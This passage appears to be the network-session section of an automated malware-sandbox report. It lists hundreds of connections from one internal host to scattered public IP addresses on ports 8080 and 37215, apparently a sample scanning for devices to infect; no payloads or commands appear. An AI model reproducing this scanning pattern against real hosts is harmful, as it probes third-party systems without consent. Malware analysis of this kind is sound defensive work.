                                                        12155192.168.2.23391145.150.90.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12156192.168.2.2346188145.92.54.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12157192.168.2.233571672.29.178.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12158192.168.2.2356394123.83.119.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12159192.168.2.2337230160.69.23.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12160192.168.2.235529665.204.151.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12161192.168.2.233416048.51.212.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12162192.168.2.2356356153.214.168.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12163192.168.2.2336668198.176.63.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12164192.168.2.235051051.255.167.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12165192.168.2.233981841.33.184.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12166192.168.2.2337926177.34.106.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12167192.168.2.2351664116.66.177.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12168192.168.2.234285250.61.93.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12169192.168.2.234812023.41.145.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12170192.168.2.233725877.197.69.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12171192.168.2.234433431.96.103.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12172192.168.2.2352798100.51.202.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12173192.168.2.234160481.132.179.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12174192.168.2.2352626131.130.216.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12175192.168.2.233438644.178.101.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12176192.168.2.2348756133.81.108.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12177192.168.2.2358026212.137.31.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12178192.168.2.235284443.157.243.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12179192.168.2.2347070158.117.81.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12180192.168.2.2349816189.165.164.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12181192.168.2.2350936200.50.192.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12182192.168.2.2346816205.167.51.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12183192.168.2.2360982216.25.126.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12184192.168.2.234222219.0.216.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12185192.168.2.2359276113.250.218.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12186192.168.2.2360924203.43.164.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12187192.168.2.2341956150.138.74.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12188192.168.2.235004270.70.116.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12189192.168.2.23564609.232.26.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12190192.168.2.233425684.67.158.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12191192.168.2.2360594149.146.191.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12192192.168.2.2350808128.77.138.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12193192.168.2.2354960189.179.253.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12194192.168.2.2354758199.59.77.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12195192.168.2.2344952221.245.254.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12196192.168.2.2359022157.158.113.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12197192.168.2.2337296104.242.245.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12198192.168.2.234955294.166.205.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12199192.168.2.2353834112.198.131.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12200192.168.2.2339560179.41.217.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12201192.168.2.2345324217.226.99.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12202192.168.2.234884868.199.107.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12203192.168.2.2334218106.95.42.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12204192.168.2.2352050174.103.59.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12205192.168.2.234514873.115.126.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12206192.168.2.235673293.66.67.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12207192.168.2.2335022134.7.58.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12208192.168.2.2359012142.30.135.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12209192.168.2.2347052222.136.22.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12210192.168.2.2355350106.235.224.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12211192.168.2.235584643.30.21.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12212192.168.2.2356572171.117.11.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12213192.168.2.233299498.136.209.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12214192.168.2.235391059.135.7.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12215192.168.2.2337610124.91.219.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12216192.168.2.2343364217.110.188.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12217192.168.2.2353796199.40.174.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12218192.168.2.235360691.95.139.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12219192.168.2.233882489.16.34.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12220192.168.2.2339270200.237.138.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12221192.168.2.2351638178.154.22.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12222192.168.2.2350090188.125.125.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12223192.168.2.2336284114.90.130.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12224192.168.2.2355348176.55.247.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12225192.168.2.23372184.93.44.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12226192.168.2.2348386108.54.198.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12227192.168.2.235437690.207.202.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12228192.168.2.2355666195.179.252.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12229192.168.2.23338008.233.94.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12230192.168.2.2353816155.193.189.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12231192.168.2.23442544.106.159.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12232192.168.2.2353500197.62.55.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12233192.168.2.2345750197.51.28.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12234192.168.2.2340428221.164.219.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12235192.168.2.2346776197.145.122.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12236192.168.2.235178041.127.53.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12237192.168.2.234809641.77.47.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12238192.168.2.2339058157.141.93.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12239192.168.2.233983641.5.78.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12240192.168.2.2337732157.248.28.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12241192.168.2.2339564157.115.194.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12242192.168.2.2351232197.226.253.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12243192.168.2.2334208164.137.214.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12244192.168.2.2340084183.178.226.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12245192.168.2.234542847.75.58.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12246192.168.2.2350264158.58.218.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12247192.168.2.233394868.77.209.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12248192.168.2.235343842.166.207.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12249192.168.2.234176623.185.164.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12250192.168.2.2344064197.124.10.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12251192.168.2.2355378155.152.231.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12252192.168.2.235209848.253.71.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12253192.168.2.233787094.146.89.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12254192.168.2.235315859.150.92.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12255192.168.2.2357400180.185.77.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12256192.168.2.234634434.81.93.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12257192.168.2.2354650186.105.225.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12258192.168.2.234261854.103.10.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12259192.168.2.235587445.214.143.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12260192.168.2.234450270.129.1.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12261192.168.2.2338298200.205.1.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12262192.168.2.2344706210.33.101.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12263192.168.2.234642473.184.71.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12264192.168.2.2347350219.253.185.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12265192.168.2.2359338122.35.35.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12266192.168.2.234166660.94.34.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12267192.168.2.234136888.10.84.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12268192.168.2.2333106139.96.38.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12269192.168.2.233410470.255.49.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12270192.168.2.2334620183.89.16.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12271192.168.2.23516788.205.160.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12272192.168.2.2341206188.39.117.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12273192.168.2.2343152158.236.40.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12274192.168.2.235421861.176.213.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12275192.168.2.233378618.199.229.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12276192.168.2.2347474111.100.69.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12277192.168.2.2339378206.148.74.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12278192.168.2.2348898176.43.126.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12279192.168.2.235593481.12.160.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12280192.168.2.2353916107.162.122.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12281192.168.2.234690882.72.52.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12282192.168.2.234426469.215.238.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12283192.168.2.234210866.125.214.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12284192.168.2.2356050134.143.204.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12285192.168.2.234226896.230.33.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12286192.168.2.2346918140.34.173.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12287192.168.2.2346178220.171.70.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12288192.168.2.2349866121.254.248.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12289192.168.2.2340204190.203.177.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12290192.168.2.2348816167.180.48.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12291192.168.2.2351348116.56.114.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12292192.168.2.2335404109.46.103.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12293192.168.2.2341262188.178.37.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12294192.168.2.234315280.7.184.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12295192.168.2.2353354203.99.161.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12296192.168.2.2358388123.166.87.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12297192.168.2.2340932130.145.206.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12298192.168.2.234813299.44.223.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12299192.168.2.234934412.55.213.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12300192.168.2.2342502151.201.203.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12301192.168.2.2354110202.229.44.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12302192.168.2.2347294200.235.62.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12303192.168.2.233339858.116.209.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12304192.168.2.2350984220.198.76.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12305192.168.2.2347614120.204.194.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12306192.168.2.234794688.12.225.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12307192.168.2.2337680119.192.11.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12308192.168.2.2348242136.77.118.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12309192.168.2.23384985.186.26.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12310192.168.2.234919244.197.122.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12311192.168.2.234442261.2.153.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12312192.168.2.2351704208.129.11.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12313192.168.2.235778043.118.49.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12314192.168.2.2341332190.224.90.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12315192.168.2.235303819.156.214.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12316192.168.2.233864268.111.6.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12317192.168.2.2347816185.197.152.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12318192.168.2.2334542177.231.143.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12319192.168.2.2341602185.128.190.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12320192.168.2.233961471.66.240.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12321192.168.2.2346552116.107.90.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12322192.168.2.234172479.115.252.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12323192.168.2.235284896.198.136.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12324192.168.2.2357600130.242.128.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12325192.168.2.2340706138.249.179.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12326192.168.2.234935623.29.190.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12327192.168.2.2343164105.209.36.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12328192.168.2.235551034.99.183.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12329192.168.2.2355668213.79.61.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12330192.168.2.2342818115.192.216.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12331192.168.2.2336414167.163.135.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12332192.168.2.233715477.5.219.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12333192.168.2.234989098.76.236.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12334192.168.2.235285293.235.46.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12335192.168.2.2357496106.200.127.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12336192.168.2.2349134100.253.194.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12337192.168.2.2334914121.69.63.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12338192.168.2.2340576191.71.103.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12339192.168.2.2341868146.103.103.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12340192.168.2.234394658.49.204.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12341192.168.2.235850620.250.204.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12342192.168.2.2360898223.83.230.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12343192.168.2.2354050103.200.176.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12344192.168.2.234474658.8.40.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12345192.168.2.2333920182.36.211.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12346192.168.2.234754219.20.102.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12347192.168.2.233465476.124.228.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12348192.168.2.2352488183.23.125.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12349192.168.2.2358782160.229.244.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12350192.168.2.233571863.129.39.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12351192.168.2.235333495.31.225.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12352192.168.2.233492688.80.23.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12353192.168.2.23435621.187.108.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12354192.168.2.2342590147.212.223.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12355192.168.2.235976282.34.31.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12356192.168.2.236067853.45.178.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12357192.168.2.233952649.123.133.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12358192.168.2.2360052217.211.66.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12359192.168.2.2353090189.40.109.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12360192.168.2.2354980208.193.66.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12361192.168.2.2333790148.210.228.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12362192.168.2.233736631.139.246.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12363192.168.2.2348830175.196.74.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12364192.168.2.233970294.197.151.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12365192.168.2.2360786151.158.32.1868080
                                                        TimestampBytes transferredDirectionData


